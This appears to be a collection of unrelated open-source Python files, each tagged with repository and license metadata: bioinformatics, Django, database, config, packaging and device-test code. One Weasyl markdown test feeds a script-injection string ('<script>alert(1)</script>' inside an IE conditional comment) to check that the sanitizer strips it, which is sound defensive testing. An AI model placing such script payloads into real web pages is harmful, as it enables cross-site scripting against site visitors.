regex.search((primer_r2), sequence) if index_f != None: cut_off_f = int(index_f.span()[1]) if index_r != None: cut_off_r = int(index_r.span()[0]+1) if index_f or index_r != None: s18_list.append(record [cut_off_f:cut_off_r]) else: index_f = regex.search((primer_f3), sequence) index_r = regex.search((primer_r3), sequence) if index_f != None: cut_off_f = int(index_f.span()[1]) if index_r != None: cut_off_r = int(index_r.span()[0]+1) if index_f or index_r != None: UPA_list.append(record [cut_off_f:cut_off_r]) else: index_f = regex.search((primer_f4), sequence) index_r = regex.search((primer_r4), sequence) if index_f != None: cut_off_f = int(index_f.span()[1]) if index_r != None: cut_off_r = int(index_r.span()[0]+1) if index_f or index_r != None: tufA_list.append(record [cut_off_f:cut_off_r]) else: unmatched.append(record) #Iterate over fastq file print ("separating genes... It can take a while...") original_reads = SeqIO.parse(input_file, "fastq") do_it = primer_finder(original_reads,p16S_f,p16S_r,p18S_f,p18S_r,pUPA_f,pUPA_r,ptufA_f,ptufA_r) count_um = SeqIO.write(unmatched, output_file_umatched, "fastq") print "" print "%i sequences did not match the primers and were stored in the %s file." %(count_um, output_file_umatched) print "" count_16S = SeqIO.write(s16_list, output_file_16S, "fastq") print"", print "Saved %i reads in the %s file." %(count_16S, output_file_16S) count_18S = SeqIO.write(s18_list, output_file_18S, "fastq") print"" print "Saved %i reads in the %s file." %(count_18S, output_file_18S) count_UPA = SeqIO.write(UPA_list, output_file_UPA, "fastq") print"" print "Saved %i reads in the %s file." %(count_UPA, output_file_UPA) count_tufA = SeqIO.write(tufA_list, output_file_tufA, "fastq") print"" print "Saved %i reads in the %s file." %(count_tufA, output_file_tufA) print"" print "Done!"
vrmarcelino/Shape-4-Qiime
separate_genes.py
Python
mit
5,655
from __future__ import unicode_literals from django.conf import settings from django.utils.encoding import force_text, python_2_unicode_compatible from django.contrib.messages import constants, utils LEVEL_TAGS = utils.get_level_tags() @python_2_unicode_compatible class Message(object): """ Represents an actual message that can be stored in any of the supported storage classes (typically session- or cookie-based) and rendered in a view or template. """ def __init__(self, level, message, extra_tags=None): self.level = int(level) self.message = message self.extra_tags = extra_tags def _prepare(self): """ Prepares the message for serialization by forcing the ``message`` and ``extra_tags`` to unicode in case they are lazy translations. Known "safe" types (None, int, etc.) are not converted (see Django's ``force_text`` implementation for details). """ self.message = force_text(self.message, strings_only=True) self.extra_tags = force_text(self.extra_tags, strings_only=True) def __eq__(self, other): return isinstance(other, Message) and self.level == other.level and \ self.message == other.message def __str__(self): return force_text(self.message) def _get_tags(self): label_tag = force_text(LEVEL_TAGS.get(self.level, ''), strings_only=True) extra_tags = force_text(self.extra_tags, strings_only=True) if extra_tags and label_tag: return ' '.join([extra_tags, label_tag]) elif extra_tags: return extra_tags elif label_tag: return label_tag return '' tags = property(_get_tags) class BaseStorage(object): """ This is the base backend for temporary message storage. This is not a complete class; to be a usable storage backend, it must be subclassed and the two methods ``_get`` and ``_store`` overridden. """ def __init__(self, request, *args, **kwargs): self.request = request self._queued_messages = [] self.used = False self.added_new = False super(BaseStorage, self).__init__(*args, **kwargs) def __len__(self): return len(self._loaded_messages) + len(self._queued_messages) def __iter__(self): self.used = True if self._queued_messages: self._loaded_messages.extend(self._queued_messages) self._queued_messages = [] return iter(self._loaded_messages) def __contains__(self, item): return item in self._loaded_messages or item in self._queued_messages @property def _loaded_messages(self): """ Returns a list of loaded messages, retrieving them first if they have not been loaded yet. """ if not hasattr(self, '_loaded_data'): messages, all_retrieved = self._get() self._loaded_data = messages or [] return self._loaded_data def _get(self, *args, **kwargs): """ Retrieves a list of stored messages. Returns a tuple of the messages and a flag indicating whether or not all the messages originally intended to be stored in this storage were, in fact, stored and retrieved; e.g., ``(messages, all_retrieved)``. **This method must be implemented by a subclass.** If it is possible to tell if the backend was not used (as opposed to just containing no messages) then ``None`` should be returned in place of ``messages``. """ raise NotImplementedError('subclasses of BaseStorage must provide a _get() method') def _store(self, messages, response, *args, **kwargs): """ Stores a list of messages, returning a list of any messages which could not be stored. One type of object must be able to be stored, ``Message``. **This method must be implemented by a subclass.** """ raise NotImplementedError('subclasses of BaseStorage must provide a _store() method') def _prepare_messages(self, messages): """ Prepares a list of messages for storage. """ for message in messages: message._prepare() def update(self, response): """ Stores all unread messages. If the backend has yet to be iterated, previously stored messages will be stored again. Otherwise, only messages added after the last iteration will be stored. """ self._prepare_messages(self._queued_messages) if self.used: return self._store(self._queued_messages, response) elif self.added_new: messages = self._loaded_messages + self._queued_messages return self._store(messages, response) def add(self, level, message, extra_tags=''): """ Queues a message to be stored. The message is only queued if it contained something and its level is not less than the recording level (``self.level``). """ if not message: return # Check that the message level is not less than the recording level. level = int(level) if level < self.level: return # Add the message. self.added_new = True message = Message(level, message, extra_tags=extra_tags) self._queued_messages.append(message) def _get_level(self): """ Returns the minimum recorded level. The default level is the ``MESSAGE_LEVEL`` setting. If this is not found, the ``INFO`` level is used. """ if not hasattr(self, '_level'): self._level = getattr(settings, 'MESSAGE_LEVEL', constants.INFO) return self._level def _set_level(self, value=None): """ Sets a custom minimum recorded level. If set to ``None``, the default level will be used (see the ``_get_level`` method). """ if value is None and hasattr(self, '_level'): del self._level else: self._level = int(value) level = property(_get_level, _set_level, _set_level)
ericholscher/django
django/contrib/messages/storage/base.py
Python
bsd-3-clause
6,265
# The main entrance for the optimization framework of energy router T = 24
Matrixeigs/Optimization
main.py
Python
mit
76
#python import testing testing.bitmap_modifier_benchmark("CUDABitmapMultiply")
barche/k3d
tests/bitmap/bitmap.modifier.CUDABitmapMultiply.benchmark.py
Python
gpl-2.0
81
#!/usr/bin/env python3 import json import psycopg2 def drop_tables(db, user): print('droping tables') sql_drop_repos_table = 'DROP TABLE IF EXISTS repos' sql_drop_issues_table = 'DROP TABLE IF EXISTS issues' sql_drop_labels_table = 'DROP TABLE IF EXISTS labels' try: conn = psycopg2.connect(database=db, user=user) cur = conn.cursor() cur.execute(sql_drop_issues_table) cur.execute(sql_drop_repos_table) cur.execute(sql_drop_labels_table) except psycopg2.DatabaseError as e: print(e) else: conn.commit() finally: if cur: cur.close() if conn: conn.close() print('tables dropped\n') def create_repos_table(db, user, json_fpath): print('creating repos table') with open(json_fpath, 'r') as f: repos = json.load(f) try: conn = psycopg2.connect(database=db, user=user) cur = conn.cursor() sql_create_table = ('CREATE TABLE repos (id integer PRIMARY KEY, data jsonb);') cur.execute(sql_create_table) for r in repos: sql_insert = 'INSERT INTO repos (id, data) VALUES (%s, %s::jsonb) ON CONFLICT DO NOTHING;' cur.execute(sql_insert, (r['id'], json.dumps(r),)) except psycopg2.DatabaseError as e: print(e) else: conn.commit() finally: cur.close() conn.close() print('repos table created\n') def create_issues_table(db, user, json_fpath): print('creating issues table') with open(json_fpath, 'r') as f: issues = json.load(f) try: conn = psycopg2.connect(database=db, user=user) cur = conn.cursor() sql_create_table = 'CREATE TABLE issues (id integer PRIMARY KEY, repo_id integer REFERENCES repos(id), data jsonb);' cur.execute(sql_create_table) for i in issues: sql_insert = 'INSERT INTO issues (id, repo_id, data) VALUES (%s, %s, %s::jsonb) ON CONFLICT DO NOTHING;' cur.execute(sql_insert, (i['id'], i['repo_id'], json.dumps(i),)) except psycopg2.DatabaseError as e: print(e) else: conn.commit() finally: cur.close() conn.close() print('issues table created\n') def create_labels_table(db, user, json_fpath): print('creating labels table') with open(json_fpath, 'r') as f: labels = json.load(f) try: conn = psycopg2.connect(database=db, user=user) cur = conn.cursor() sql_create_table = 'CREATE TABLE labels (id serial PRIMARY KEY, name varchar);' cur.execute(sql_create_table) for l in labels: sql_insert = 'INSERT INTO labels (name) VALUES (%s) ON CONFLICT DO NOTHING;' cur.execute(sql_insert, (l,)) except psycopg2.DatabaseError as e: print(e) else: conn.commit() finally: cur.close() conn.close() print('labels table created\n') if __name__ == '__main__': print('===== DB Creation Start =====') # conn = psycopg2.connect('dbname=db user=user host=localhost password=xxx') with open('./config.json', 'r') as f: config = json.load(f) db = config['db'] user = config['user'] drop_tables(db, user) create_repos_table(db, user, './data/repos.json') create_issues_table(db, user, './data/issues.json') create_labels_table(db, user, './data/labels.json') print('===== DB Creation Complete =====')
JmeHsieh/issue_aggregator
j2jb.py
Python
mit
3,496
# encoding: utf-8 from lxml.etree import LIBXML_VERSION import pytest from libweasyl.text import markdown, markdown_excerpt, markdown_link libxml_xfail = pytest.mark.xfail(LIBXML_VERSION < (2, 9), reason='libxml2 too old to preserve whitespace') user_linking_markdown_tests = [ ('<~spam>', '<a href="/~spam">spam</a>'), ('<!spam>', '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"></a>'), ('![](user:spam)![](user:spam)', '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"></a>' '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"></a>'), ('<!~spam>', '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"> <span>spam</span></a>'), ('![user image with alt text](user:example)', '<a href="/~example" class="user-icon"><img src="/~example/avatar"> <span>user image with alt text</span></a>'), ('<user:spam>', '<a href="/~spam">spam</a>'), ('[link](user:spam)', '<a href="/~spam">link</a>'), ('<fa:spam>', '<a href="https://www.furaffinity.net/user/spam" rel="nofollow ugc">spam</a>'), ('<da:spam>', '<a href="https://www.deviantart.com/spam" rel="nofollow ugc">spam</a>'), ('<ib:spam>', '<a href="https://inkbunny.net/spam" rel="nofollow ugc">spam</a>'), ('<sf:spam>', '<a href="https://spam.sofurry.com/" rel="nofollow ugc">spam</a>'), ] @pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests) def test_markdown_basic_user_linking(target, expected): assert markdown(target) == '<p>%s</p>\n' % (expected,) @pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests) def test_markdown_user_linking_in_tag(target, expected): assert markdown('<em>%s</em>' % (target,)) == '<p><em>%s</em></p>\n' % (expected,) @pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests) def test_markdown_user_linking_in_tail(target, expected): assert markdown('<em>eggs</em>%s' % (target,)) == '<p><em>eggs</em>%s</p>\n' % (expected,) @libxml_xfail @pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests) def test_markdown_user_linking_twice_in_tag(target, expected): assert markdown('<em>%s %s</em>' % (target, target)) == '<p><em>%s %s</em></p>\n' % (expected, expected) @pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests) def test_markdown_user_linking_twice_in_tag_with_more_text_between(target, expected): assert markdown('<em>%s spam %s</em>' % (target, target)) == '<p><em>%s spam %s</em></p>\n' % (expected, expected) @libxml_xfail @pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests) def test_markdown_user_linking_twice_in_tail(target, expected): assert markdown('<em>eggs</em>%s %s' % (target, target)) == ( '<p><em>eggs</em>%s %s</p>\n' % (expected, expected)) @pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests) def test_markdown_user_linking_twice_in_tail_with_more_text_betweeen(target, expected): assert markdown('<em>eggs</em>%s spam %s' % (target, target)) == ( '<p><em>eggs</em>%s spam %s</p>\n' % (expected, expected)) @pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests) def test_markdown_user_linking_in_markdown(target, expected): assert markdown('*%s*' % (target,)) == '<p><em>%s</em></p>\n' % (expected,) def test_markdown_no_user_links_in_code(): assert markdown('<code><~spam></code>') == '<p><code>&lt;~spam&gt;</code></p>\n' def test_markdown_no_user_links_in_pre(): assert markdown('<pre><~spam></pre>') == '<pre><p>&lt;~spam&gt;</p></pre>\n' def test_markdown_no_user_links_in_links(): assert markdown('<a><~spam></a>') == '<p><a>&lt;~spam&gt;</a></p>\n' def test_markdown_escaped_user_link(): assert markdown('\\\\<~spam>') == '<p>&lt;~spam&gt;</p>\n' def test_markdown_multi_element(): assert markdown('one\n\ntwo') == '<p>one</p>\n\n<p>two</p>\n' def test_markdown_user_linking_with_underscore(): assert markdown('<~hello_world>') == '<p><a href="/~helloworld">hello_world</a></p>\n' def test_markdown_image_replacement(): assert markdown('![example](http://example)') == '<p><a href="http://example" rel="nofollow ugc">example</a></p>\n' assert markdown('<img alt="broken">') == '<p><a href="">broken</a></p>\n' def test_forum_whitelist(): assert markdown('https://forums.weasyl.com/foo') == ( '<p><a href="https://forums.weasyl.com/foo">https://forums.weasyl.com/foo</a></p>\n') def test_markdown_no_autolink_in_html_link(): assert markdown('[https://foo.test/](https://bar.test/)') == '<p><a href="https://bar.test/" rel="nofollow ugc">https://foo.test/</a></p>\n' assert markdown('[@foo@bar.test](https://baz.test/)') == '<p><a href="https://baz.test/" rel="nofollow ugc">@foo@bar.test</a></p>\n' assert markdown('<a href="https://bar.test/">https://foo.test/</a>') == '<p><a href="https://bar.test/" rel="nofollow ugc">https://foo.test/</a></p>\n' assert markdown('<A href="https://baz.test/">@foo@bar.test</A>') == '<p><a href="https://baz.test/" rel="nofollow ugc">@foo@bar.test</a></p>\n' assert markdown('<a href="https://baz.test/">@foo@bar.test</a>') == '<p><a href="https://baz.test/" rel="nofollow ugc">@foo@bar.test</a></p>\n' assert markdown('<b>https://foo.test/</b>') == '<p><b><a href="https://foo.test/" rel="nofollow ugc">https://foo.test/</a></b></p>\n' assert markdown('<b>@foo@bar.test</b>') == '<p><b>@<a href="mailto:foo@bar.test">foo@bar.test</a></b></p>\n' def test_markdown_unordered_list(): assert markdown('- five\n- six\n- seven') == '<ul><li>five</li>\n<li>six</li>\n<li>seven</li>\n</ul>' def test_markdown_regular_ordered_list_start(): assert markdown('1. five\n1. six\n1. seven') == '<ol start="1"><li>five</li>\n<li>six</li>\n<li>seven</li>\n</ol>' def test_markdown_respect_ordered_list_start(): assert markdown('5. five\n6. six\n7. seven') == '<ol start="5"><li>five</li>\n<li>six</li>\n<li>seven</li>\n</ol>' def test_markdown_strikethrough(): assert markdown(u"~~test~~") == u"<p><del>test</del></p>\n" @pytest.mark.parametrize(('target', 'expected'), [ (u"[external](http://example.com/)", u'<a href="http://example.com/" rel="nofollow ugc">external</a>'), (u'<a href="http://example.com/">external</a>', u'<a href="http://example.com/" rel="nofollow ugc">external</a>'), (u'<a href="http://example.com/" rel="noreferrer">external</a>', u'<a href="http://example.com/" rel="nofollow ugc">external</a>'), (u"[external](//example.com/)", u'<a href="//example.com/" rel="nofollow ugc">external</a>'), ]) def test_markdown_external_link_noreferrer(target, expected): assert markdown(target) == u"<p>%s</p>\n" % (expected,) markdown_link_tests = [ (('spam', '/eggs'), '[spam](/eggs)'), ((']spam[', '/eggs'), r'[\]spam\[](/eggs)'), (('[[spam]', '/eggs'), r'[\[\[spam\]](/eggs)'), ] @pytest.mark.parametrize(('target', 'expected'), markdown_link_tests) def test_markdown_link(target, expected): assert markdown_link(*target) == expected def test_tag_stripping(): assert markdown(u"<button>text</button>") == u"<p>text</p>\n" assert markdown(u"<button><button>text</button></button>") == u"<p>text</p>\n" assert markdown(u"<!--[if IE]><script>alert(1)</script><![endif]-->") == u"\n" markdown_excerpt_tests = [ (u'', u''), (u'short', u'short'), (u'just short enoughAAAAAAAAAAAAA', u'just short enoughAAAAAAAAAAAAA'), (u'not short enoughAAAAAAAAAAAAAAA', u'not short enoughAAAAAAAAAAAAA…'), (u'*leading* inline formatting', u'leading inline formatting'), (u'middle *inline* formatting', u'middle inline formatting'), (u'trailing inline *formatting*', u'trailing inline formatting'), (u'*nested **inline** formatting*', u'nested inline formatting'), (u' unnecessary whitespace\t', u'unnecessary whitespace'), (u'multiple\nlines', u'multiple lines'), (u'multiple \nlines', u'multiple lines'), (u'multiple\n\nparagraphs', u'multiple paragraphs'), (u'Üñíçôđe\N{COMBINING ACUTE ACCENT}', u'Üñíçôđe\N{COMBINING ACUTE ACCENT}'), (u'single-codepoint graphemes😊😊😊😊', u'single-codepoint graphemes😊😊😊😊'), (u'single-codepoint graphemes😊😊😊😊😊', u'single-codepoint graphemes😊😊😊…'), (u'test\n - lists\n - of\n - items\n\ntest', u'test lists of items test'), ] @pytest.mark.parametrize(('target', 'expected'), markdown_excerpt_tests) def test_excerpt(target, expected): assert markdown_excerpt(target, length=30) == expected def test_excerpt_default_length(): assert markdown_excerpt(u'a' * 300) == u'a' * 300 assert markdown_excerpt(u'a' * 301) == u'a' * 299 + u'…'
Weasyl/weasyl
libweasyl/libweasyl/test/test_text.py
Python
apache-2.0
8,802
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: # Copyright 2018-2021 Florian Bruhin (The Compiler) <mail@qutebrowser.org> # # This file is part of qutebrowser. # # qutebrowser is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # qutebrowser is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with qutebrowser. If not, see <http://www.gnu.org/licenses/>. """Access to the qutebrowser configuration.""" from typing import cast, Any from PyQt5.QtCore import QUrl from qutebrowser.config import config #: Simplified access to config values using attribute access. #: For example, to access the ``content.javascript.enabled`` setting, #: you can do:: #: #: if config.val.content.javascript.enabled: #: ... #: #: This also supports setting configuration values:: #: #: config.val.content.javascript.enabled = False val = cast('config.ConfigContainer', None) def get(name: str, url: QUrl = None) -> Any: """Get a value from the config based on a string name.""" return config.instance.get(name, url)
forkbong/qutebrowser
qutebrowser/api/config.py
Python
gpl-3.0
1,462
""" Loads editquality config, mainly used as template parameters. The responsibility of this process is to simplify the template's work and other consumers, as much as possible. """ import glob import os import deep_merge import yaml def load_config(config_dir=None): model_defaults = yaml.safe_load( open(os.path.join(config_dir, "model_defaults.yaml"))) wiki_defaults = yaml.safe_load( open(os.path.join(config_dir, "wiki_defaults.yaml"))) manual_wikis = yaml.safe_load( open(os.path.join(config_dir, "manual_wikis.yaml"))) globals = yaml.safe_load( open(os.path.join(config_dir, "globals.yaml"))) all_files = sorted(glob.glob(config_dir + "/wikis/*.yaml")) wikis = [yaml.safe_load(open(f, "r")) for f in all_files] wiki_names = [i['name'] for i in wikis] + manual_wikis['manual_wikis'] wiki_names.sort() config = { "model_defaults": model_defaults, "wiki_defaults": wiki_defaults, "globals": globals, "wikis": wikis, 'wiki_names': wiki_names, } config = populate_defaults(config) config['wikis'].sort(key=lambda t: t['name']) return config def load_wiki(wiki_config, config): # Merge in wiki defaults wiki_config = deep_merge.merge({}, config["wiki_defaults"], wiki_config, merge_lists=deep_merge.overwrite) for model_name, model_config in wiki_config.get('models', {}).items(): # Merge in model defaults model_config = deep_merge.merge( {}, config["model_defaults"], model_config) wiki_config['models'][model_name] = model_config return wiki_config def populate_defaults(config): wikis_config = [] for wiki_config in config["wikis"]: wikis_config.append(load_wiki(wiki_config, config)) config["wikis"] = wikis_config return config
wiki-ai/editquality
editquality/config.py
Python
mit
1,884
#!/usr/bin/env python import io import os import os.path import re from setuptools import setup, find_packages # FIXME: this information should come from the script itself... __projectname__ = "suse-doc-style-checker" __programname__ = "SUSE Documentation Style Checker" # __version__ will be read from sdsc/__init__.py __authors__ = "Stefan Knorr, Thomas Schraitle" __license__ = "LGPL-2.1+" __description__ = "checks a given DocBook XML file for stylistic errors" HERE = os.path.abspath(os.path.dirname(__file__)) def requires(filename): """Returns a list of all pip requirements :param filename: the Pip requirement file (usually 'requirements.txt') :return: list of modules :rtype: list """ modules = [] with open(filename, 'r') as pipreq: for line in pipreq: line = line.strip() if line.startswith('#') or not line: continue # if line.startswith('-r'): # TODO: what to do here? modules.append(line) return modules def read(*names, **kwargs): """Read in file """ with io.open(os.path.join(HERE, *names), encoding=kwargs.get("encoding", "utf8")) as fp: return fp.read() def find_version(*file_paths): """Read __version__ string from file paths :return: version string :rtype: str """ version_file = read(*file_paths) version_match = re.search(r"^__version__\s*=\s*['\"]([^'\"]*)['\"]", version_file, re.M) if version_match: return version_match.group(1) raise RuntimeError("Unable to find version string.") setupdict = dict( name=__projectname__, # Versions should comply with PEP440. For a discussion on single-sourcing # the version across setup.py and the project code, see # http://python-packaging-user-guide.readthedocs.org/en/latest/single_source_version/ version=find_version("src", "sdsc", "__init__.py"), # __version__, description=__description__, long_description="Checks a given DocBook XML file for stylistic errors using check files written in XSLT", # The project's main homepage. url='https://www.github.org/openSUSE/suse-doc-style-checker', download_url='https://github.org/openSUSE/suse-doc-style-checker/releases', # Author details author=__authors__, author_email='sknorr@suse.de', license=__license__, # See https://pypi.python.org/pypi?%3Aaction=list_classifiers classifiers=[ # How mature is this project? Common values are # 3 - Alpha # 4 - Beta # 5 - Production/Stable 'Development Status :: 5 - Production/Stable', # Indicate who your project is intended for 'Topic :: Documentation', 'Topic :: Software Development :: Documentation', 'Intended Audience :: Developers', # Pick your license as you wish (should match "license" above) 'License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)', # Supported Python versions 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Topic :: Utilities', ], keywords=["docbook5", "style", "style-checking"], # ---- # Includes data files from MANIFEST.in # # See also: # http://stackoverflow.com/a/16576850 # https://pythonhosted.org/setuptools/setuptools.html#including-data-files include_package_data=True, # You can just specify the packages manually here if your project is # simple. Or you can use find_packages(). # toms: Check this packages=find_packages('src', exclude=('.+\.xml',)), package_dir={'': 'src'}, # List run-time dependencies here. These will be installed by pip when # your project is installed. For an analysis of "install_requires" vs pip's # requirements files see: # https://packaging.python.org/en/latest/requirements.html install_requires=requires('requirements.txt'), # To provide executable scripts, use entry points in preference to the # "scripts" keyword. Entry points provide cross-platform support and allow # pip to create the appropriate form of executable for the target platform. entry_points={ 'console_scripts': ['sdsc=sdsc.cli:main'], }, # Required packages for using "setup.py test" setup_requires=['pytest-runner'], tests_require=['pytest', 'pytest-cov', 'pytest-catchlog'], ) # Call it: setup(**setupdict) # EOF
tomschr/sdsc
setup.py
Python
lgpl-2.1
4,642
# Copyright (c) 2017 Huawei, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from django.utils.translation import ugettext_lazy as _ import horizon from conveyordashboard import dashboard class ProjectLevelOverview(horizon.Panel): name = _("Project Level") slug = 'overview_project' dashboard.Conveyor.register(ProjectLevelOverview)
Hybrid-Cloud/conveyor-dashboard
conveyordashboard/overview_project/panel.py
Python
apache-2.0
878
#!/usr/bin/python2.5 # Copyright (C) 2007 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Editor of stop locations in GTFS feed. # # This is an extension of schedule_viewer.py, which allows editing # of stop location usig drag'n'drop. # You must provide a Google Maps API key. # # Usage: # location_editor.py --key `cat key` --port 8765 --feed_filename feed.zip import schedule_viewer import transitfeed class LocationEditorRequestHandler(schedule_viewer.ScheduleRequestHandler): def handle_json_GET_setstoplocation(self, params): schedule = self.server.schedule stop_id = params.get('id', None) lat = params.get('lat', -1) lon = params.get('lng', -1) stop = schedule.GetStop(stop_id) if (stop is None): msg = 'Stop with id=' + stop_id + 'not found.' else: stop.stop_lat = float(lat) stop.stop_lon = float(lon) msg = 'Location of ' + stop['stop_name'] + '(' + stop_id + ') set to ' + \ lat + 'x' + lon print msg return msg def handle_json_GET_savedata(self, params): schedule = self.server.schedule if not self.server.feed_path: msg = 'Feed path not defined' else: schedule.WriteGoogleTransitFeed(self.server.feed_path) msg = 'Data saved to ' + self.server.feed_path print msg return msg def AllowEditMode(self): return True if __name__ == '__main__': schedule_viewer.main(LocationEditorRequestHandler)
Censio/transitfeed
location_editor.py
Python
apache-2.0
1,943
#!/usr/bin/env python # -*- coding: utf-8 -*- # pylint: disable-msg=C0103 # pylint: disable-msg=C0301 """ View the status of a given xengine. Created on Fri Jan 3 10:40:53 2014 @author: paulp """ import argparse from casperfpga import utils from casperfpga.casperfpga import CasperFpga try: import corr2 import os except ImportError: corr2 = None os = None parser = argparse.ArgumentParser( description='Display TenGBE interface information ' 'about a MeerKAT fpga host.', formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument( '--hosts', dest='hosts', type=str, action='store', default='', help='comma-delimited list of hosts, or a corr2 config file') parser.add_argument( '-c', '--core', dest='core', action='store', default='all', type=str, help='which core to query') parser.add_argument( '--arp', dest='arp', action='store_true', default=False, help='print the ARP table') parser.add_argument( '--cpu', dest='cpu', action='store_true', default=False, help='print the CPU details') parser.add_argument( '--comms', dest='comms', action='store', default='katcp', type=str, help='katcp (default) or dcp?') parser.add_argument( '--loglevel', dest='log_level', action='store', default='', help='log level to use, default None, options INFO, DEBUG, ERROR') args = parser.parse_args() if args.log_level != '': import logging log_level = args.log_level.strip() try: logging.basicConfig(level=eval('logging.%s' % log_level)) except AttributeError: raise RuntimeError('No such log level: %s' % log_level) # create the devices and connect to them if args.hosts.strip() == '': if corr2 is None or 'CORR2INI' not in os.environ.keys(): raise RuntimeError('No hosts given and no corr2 config found. ' 'No hosts.') fpgas = corr2.utils.script_get_fpgas(args) else: hosts = args.hosts.strip().replace(' ', '').split(',') if len(hosts) == 0: raise RuntimeError('No good carrying on without hosts.') fpgas = utils.threaded_create_fpgas_from_hosts(hosts) utils.threaded_fpga_function(fpgas, 15, ('get_system_information', [], {})) for fpga in fpgas: numgbes = len(fpga.gbes) if numgbes < 1: raise RuntimeWarning('Host %s has no gbe cores', fpga.host) print('%s: found %i gbe core%s: %s' % ( fpga.host, numgbes, '' if numgbes == 1 else 's', fpga.gbes.keys())) for fpga in fpgas: if args.core == 'all': cores = fpga.gbes.names() else: cores = [args.core] print(50*'#') print('%s:' % fpga.host) print(50*'#') for core in cores: fpga.gbes[core].print_gbe_core_details( arp=args.arp, cpu=args.cpu, refresh=True) # handle exits cleanly utils.threaded_fpga_function(fpgas, 10, 'disconnect') # end
ska-sa/casperfpga
scripts/casperfpga_tengbe_coreinfo.py
Python
gpl-2.0
2,880
# Copyright 2022 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test suite for devices using file transfer functions.""" import hashlib import os from typing import Type from gazoo_device.tests.functional_tests.utils import gdm_test_base import immutabledict from mobly import asserts _COMMANDS = immutabledict.immutabledict({ "IS_WRITABLE_DIRECTORY": "test -d {path} && test -w {path}", "REMOVE_FILE": "rm {path}", }) def file_sha256(src_file_path: str) -> str: """Calculate the SHA256 hash of the given file. Args: src_file_path: Path to the file to be hashed. Returns: SHA256 hash of the file in hex digest format. """ sha256sum = hashlib.sha256() with open(src_file_path, "rb") as src_file: buf = src_file.read(65536) while buf: sha256sum.update(buf) buf = src_file.read(65536) return sha256sum.hexdigest() class FileTransferTestSuite(gdm_test_base.GDMTestBase): """Functional test suite for the file transfer capability.""" @classmethod def is_applicable_to(cls, device_type: str, device_class: Type[gdm_test_base.DeviceType], device_name: str) -> bool: """Determine if this test suite can run on the given device.""" return device_class.has_capabilities(["file_transfer"]) @classmethod def requires_pairing(cls) -> bool: """Returns True if the device must be paired to run this test suite.""" return False def setup_test(self): """Creates a text source file for transfer to the device.""" super().setup_test() file_contents = "The quick brown dog jumps over the lazy fox\n" self.host_source_path = os.path.join(self.log_path, "file_transfer_source.txt") with open(self.host_source_path, "w") as open_file: open_file.write(file_contents) def test_file_transfer(self): """Tests sending a file to the device and receiving it.""" received_file_name = "file_transfer_received.txt" device_dir = self._get_writable_directory() device_path = os.path.join(device_dir, received_file_name) self.device.file_transfer.send_file_to_device(self.host_source_path, device_path) host_received_path = os.path.join(self.log_path, received_file_name) try: self.device.file_transfer.recv_file_from_device(device_path, host_received_path) asserts.assert_true( os.path.exists(host_received_path), f"recv_file_from_device did not create {host_received_path}") with open(self.host_source_path) as source_file: with open(host_received_path) as received_file: asserts.assert_equal(source_file.read(), received_file.read(), "Received file was not equal to the sent file") finally: self.device.shell(_COMMANDS["REMOVE_FILE"].format(path=device_path)) def _get_writable_directory(self) -> str: """Returns a writable directory on the device.""" possible_dirs = [ "/tmp", ] for possible_dir in possible_dirs: _, return_code = self.device.shell( _COMMANDS["IS_WRITABLE_DIRECTORY"].format(path=possible_dir), include_return_code=True) if return_code == 0: return possible_dir asserts.fail("Failed to find a writable directory on the device. " f"Known possible directories {possible_dirs} did not work. " "Find an appropriate directory and add it to the list.") if __name__ == "__main__": gdm_test_base.main()
google/gazoo-device
gazoo_device/tests/functional_tests/file_transfer_test_suite.py
Python
apache-2.0
4,139
